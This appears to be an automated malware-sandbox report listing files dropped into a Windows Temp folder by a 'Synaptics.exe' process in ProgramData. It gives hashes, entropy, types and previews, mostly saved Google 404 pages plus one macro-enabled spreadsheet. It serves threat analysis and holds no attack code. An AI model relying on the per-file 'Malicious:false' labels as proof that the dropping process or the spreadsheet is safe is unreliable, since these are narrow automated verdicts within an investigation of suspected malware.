                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jwGa6TFm2eo6R1SPRv8XEg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Ic8uC8A.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.272737069689737
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0S9SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+R+pAZewRDK4mW
                                                                                                                                                                                  MD5:5C78DBE9814326EF0F33340D0B3213B8
                                                                                                                                                                                  SHA1:DFF73AFC3FB2EDB57C6DC1638C59035693503EEA
                                                                                                                                                                                  SHA-256:02EBDF85208F7C8EDFCB0E74C3C85CBB2E4181B18AE3CABA4A467E047A9D4E0D
                                                                                                                                                                                  SHA-512:EC5A82E04696DABD43F2D290F8F6AC38B2B09B36E584856CB1099560552BFD17856F0E936ADD18C0976827F73259FE017270CBF0956AA90630A7C9DDF54C8BA0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jEDCK6zfHSAtsTy1Vrpa3A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Iu5LnKt.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.275647966778739
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                                                                                                  MD5:12552FFFB98C72E3D61EDE30E6029A17
                                                                                                                                                                                  SHA1:CC8CA4BACFF9E8D685D739F201FF28BC86CD2A5E
                                                                                                                                                                                  SHA-256:8F443DCDD0F98F6730147C1C602CBA2D5353174934F445747DE55B4003662323
                                                                                                                                                                                  SHA-512:F202E9C552C29DDB201A1E990833682FB1CD34D4C4DE6ED5DB991AFCED1A8497AC6D490791D309AB63C70A999E74C30C25819AE890745CE106A0067436D90A6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2W6qPIS_b73Q3WrGL7Qw6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\JLGkYinr.xlsm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18387
                                                                                                                                                                                  Entropy (8bit):7.523057953697544
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                  MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                  SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                  SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                  SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Kfha93p.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.259133983805142
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0/5YbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+aYb+pAZewRDK4mW
                                                                                                                                                                                  MD5:0DA4C5D89FA64EC159313C0FFA5D9D8A
                                                                                                                                                                                  SHA1:2C1916F0C5CA0D49EA139AC131896263D0183A85
                                                                                                                                                                                  SHA-256:3E15D763CA8066C973FCB6D5E07DB5A739B120290F857EEB7393CDFE706A0675
                                                                                                                                                                                  SHA-512:2CBBE080EE5F991684CD3EA159910C55651438406CDAF7B7EC44B93C8648168C1F23121F6DDE8BAAE8020FEBBE003426D89655A89889646AB682F522A89DD002
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Z977rMPLluC4dr3rInCShw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\LUfeoEP.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.266258766461429
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0wSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n+pAZewRDK4mW
                                                                                                                                                                                  MD5:6C53821C1652701FCC42F91D02BB6677
                                                                                                                                                                                  SHA1:978D1ECE5BC66E9161DF355AA123223A5FE13845
                                                                                                                                                                                  SHA-256:13F079DE06F49489D3ADD84CEF4870AF9E2939F0890F7C74E48F0645CA4A42C3
                                                                                                                                                                                  SHA-512:C07F5CEE3716FACFB9CAAE53EE78FBB6F911771B66A98BC1299A8D4E75B4F19F28469F6B117742ABA4948DA716E2DA0B2E1EED9B37A8E8F38FC0D030D2F6B13B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9y3LbJWtiLV-xuOXE3OyNw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\LydnHOF.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.263791784728812
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0pSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                                                                                                  MD5:415DB6D8BF73BD5A53D19787E5237479
                                                                                                                                                                                  SHA1:1ECE19BC2C91732C8CA927C3185E55F142BD1D97
                                                                                                                                                                                  SHA-256:0C7EA6E89DBD09AFD0C5DB8C5B36B8B5592224F74093951EEFC21C4C25C3A0B7
                                                                                                                                                                                  SHA-512:522484433DBDDEC81A3F79A6026B2E8E6E4217A9795E38973B12345F8E1BC28B0619143F264DA747AE0C13B791F638E589D273ECC5E6050A8FA50A23D18C73A3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UtvDHBSxiwdSC48urvyIPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\P2shWGk.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.265897492297341
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0DXnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                                                                                  MD5:540B14C590519C710ED169C398F9CDFE
                                                                                                                                                                                  SHA1:39DD7C6D8EDE50BD4AEE709353F13030F54B3303
                                                                                                                                                                                  SHA-256:06095CAF7202CF625636B9FB278EC2E2C307960AD3CD152E0645A60E87173F2F
                                                                                                                                                                                  SHA-512:E833FD9EACDDE33C1928F167737CD8445D28ADF090661FDFE1444213232685565290212A8B5B6486D91B715D822924D8834DEF27F35CDAA71B7C6DA8CF739BCB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3UJnTO9aTQOecf0YvCKTQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\PaJ72uv.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.250914658910339
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0sTOSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hTO+pAZewRDK4mW
                                                                                                                                                                                  MD5:E57A865DD3F055AE8F903B9C45CC9FD1
                                                                                                                                                                                  SHA1:B0DDE60F08EBEA3F14C9703D3EADC92AC751D67A
                                                                                                                                                                                  SHA-256:8D3F0E552A2AEFBB8CB881598B2E3C10BE7FCA949B307FA5E29BC5D2F864DA41
                                                                                                                                                                                  SHA-512:E8D4A7BAC51C06F2B23C6DBEA11134AD1961CC79A3C12AEDAFAD98052F6C025343E671215F50CF2BD32503BCD24C2DF14FD2345D44464E76BC0C7493C04886DD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4USvdr1k3y-r6w11nyDL8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\PhWt9f1.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.260276838139488
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0SU1SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C1+pAZewRDK4mW
                                                                                                                                                                                  MD5:FC4A119BA3C2B7E79C7042E556AD334B
                                                                                                                                                                                  SHA1:B7D85A1F0239BC0507E8BE930444060B20C4EEF1
                                                                                                                                                                                  SHA-256:0F5AD98D774D603C945F01282C6C272C5DA0BB0099320C5046A9CA11A4FDF86C
                                                                                                                                                                                  SHA-512:C791A003B6EFE61DECF7597A3CC12F3516C499DA93C16FA4E4C3657B924D7B2B61021D03251C40A0572301038CA830EADF9CD44AA3460AD10569760BAE0354B8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="w4Nch86YxzSmOv6-_iFugQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QGPIBsL.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.249324697157812
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0pSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                                                                                                                  MD5:804334557EB68C79E64D81E4B7079A44
                                                                                                                                                                                  SHA1:9A71EE7B7106CDCEC2653D7BFC79C85D1C57E3DC
                                                                                                                                                                                  SHA-256:E05EF8DE6D933F37E363F0204C54993437B280E3B05740676D3104AF8FBB7F91
                                                                                                                                                                                  SHA-512:0392B6E2078F6E2DDC08602816580413938477CB51A91F0AB69B2F505DD1AEF32DE60D0B19AA26A4EEE9FFB766BBBF7F57254115653E015A79C41737FF4365F9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cU_FrzrBek-yvjgux8ryKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QOgdGel.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.279563873171768
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0VzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K+pAZewRDK4mW
                                                                                                                                                                                  MD5:2566826562214644BE39E40AA5520F57
                                                                                                                                                                                  SHA1:A12A4684AC04BDC09E03B0743CCF24B77514BBBD
                                                                                                                                                                                  SHA-256:6584978CCE12771C2CDE2D28B463009E21EE0ECCBD8E9FE0E9C53620485324D8
                                                                                                                                                                                  SHA-512:C52D529AF9A8DFAD9AA071E70B68BF8A024A67A7CAB657CA313C827E03228DDF811F838D1A4E8B767D001C795433A232D707BF575001BAF4070811437B0AA14E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WsQA4IUAqjUv4ESiRPu8NQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\SJhUPNO.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.259528823825647
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                                                                                                  MD5:373502D24F779C26568D51B6005112A5
                                                                                                                                                                                  SHA1:A23474BF3FFFBFF7714EE2531B963CB2AB87F86B
                                                                                                                                                                                  SHA-256:BD29226552B0F39043D1549A2147312A8770E79AC794ED764C99F8B83C9473DD
                                                                                                                                                                                  SHA-512:205B158CD66198A70D7AB983ECD0B5A312BAD274C66303E94AB6727E0EB14264304796754A787C46626D70AD1557CE2375DB265780202D5C98A2E58D9E575906
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2nukqy-9WvhGbM-3LC5TQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\SwJtTBK.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.256868234451029
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0aSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                                                                                                  MD5:B929772F9F83921706AFD7CF5F1EA50B
                                                                                                                                                                                  SHA1:5B0F1CFB72FAF4231F2F0E3CA5806E7D7865C2DB
                                                                                                                                                                                  SHA-256:1712CD6A86F6AD9DBEDB1C742EBB5336024F803E3BD2E8DC7E44F4C67BB283BA
                                                                                                                                                                                  SHA-512:42128BB06CD2F410C06209CCBC985510102BC44724B817D107C1B156A81B6D7F1885C9937E382BB77B873C33B0D13347FF648DB1707BC95FA50F356E42411E15
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="064PcoFquj7ijZI1eA5piw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\SwNLlbq.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.2686643142417635
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0egSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Lg+pAZewRDK4mW
                                                                                                                                                                                  MD5:A8FCAB3371DDF66F8834F20409B08643
                                                                                                                                                                                  SHA1:A9DD2773303C14D54D15F982D7B2EFC31807C5C7
                                                                                                                                                                                  SHA-256:612DB6AE2E6055AACFBA9A494EA6291C09B3FC057FFBD678E3AA8FBD11DCE041
                                                                                                                                                                                  SHA-512:2817E71ADBBC27B16E58A767A50697DAE927F51E9FDA04F8F0926AE479AFF21A7CFF3C1C259360F55991AC73C88EAE7D6B1201FC2AFF73BE2A4D5767DED88183
                                                                                                                                                                                  Malicious:false
